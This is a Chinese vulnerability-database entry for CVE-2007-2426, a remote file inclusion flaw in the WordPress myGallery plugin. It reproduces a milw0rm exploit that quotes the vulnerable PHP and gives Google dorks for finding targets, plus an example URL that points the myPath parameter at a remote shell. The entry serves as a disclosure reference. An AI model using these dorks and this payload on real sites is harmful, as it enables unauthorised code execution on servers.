Wordpress MyGallery Plugin 'mygallerybrowser.php' 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112818 漏洞类型 代码注入
发布时间 2007-04-29 更新时间 2007-05-04
CVE编号 CVE-2007-2426 CNNVD-ID CNNVD-200705-015
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3814
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-015
|漏洞详情
WordPressmyGalleryplugin的myfunctions/mygallerybrowser.php中存在PHP远程文件包含漏洞。远程攻击者可以借助myPath参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
AAAAAAAAA AAAAAAAA  AAA   AAA    AAA      AAAAAAAA   
AAAAAAAAA AAAAAAAAA AAA   AAA   AAAAA    AAAAAAAAAA  
   AAA    AAA   AAA  AAA AAA   AAAAAAA  AAA       
   AAA    AAAAAAAAA   AAAAA   AAA   AAA AAA     AAAAA
   AAA    AAAAAAAA     AAA    AAA   AAA AAA     AAAAA
   AAA    AAA AAA      AAA    AAAAAAAAA AAA      AAA  
   AAA    AAA  AAA     AAA    AAA   AAA  AAAAAAAAAA    
   AAA    AAA   AAA    AAA    AAA   AAA   AAAAAAAA     


# myGallery 1.2.1(myPath)Remote File Include Vulnerablity
# Script Paeg : http://www.wildbits.de/usr_files/mygallery_1.2.1.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code 
#########################################################
# if (!$_POST){
# 	$mypath=$_GET['myPath']; <---------[+]
# 
# }
# else {
# 	$mypath=$_POST['myPath'];<---------[+]
# 	
# 	
# }
# require_once($mypath.'/wp-config.php');<---------[+]
########################################################
# Dork : 
# inurl:/mygallery/myfunctions/ (OR) Index of /mygallery/myfunctions (OR) inurl:mygallerytmpl.php
# Ex:
# [Path_myGallery]/mygallery/myfunctions/mygallerybrowser.php?myPath=Shell
# Sp.Thanx = Tryag-Team

# milw0rm.com [2007-04-29]
|参考资料

来源:XF
名称:mygallery-mygallerybrowser-file-include(33955)
链接:http://xforce.iss.net/xforce/xfdb/33955
来源:BID
名称:23702
链接:http://www.securityfocus.com/bid/23702
来源:MILW0RM
名称:3814
链接:http://www.milw0rm.com/exploits/3814
来源:VUPEN
名称:ADV-2007-1582
链接:http://www.frsirt.com/english/advisories/2007/1582
来源:SECUNIA
名称:25042
链接:http://secunia.com/advisories/25042
来源:OSVDB
名称:34356
链接:http://osvdb.org/34356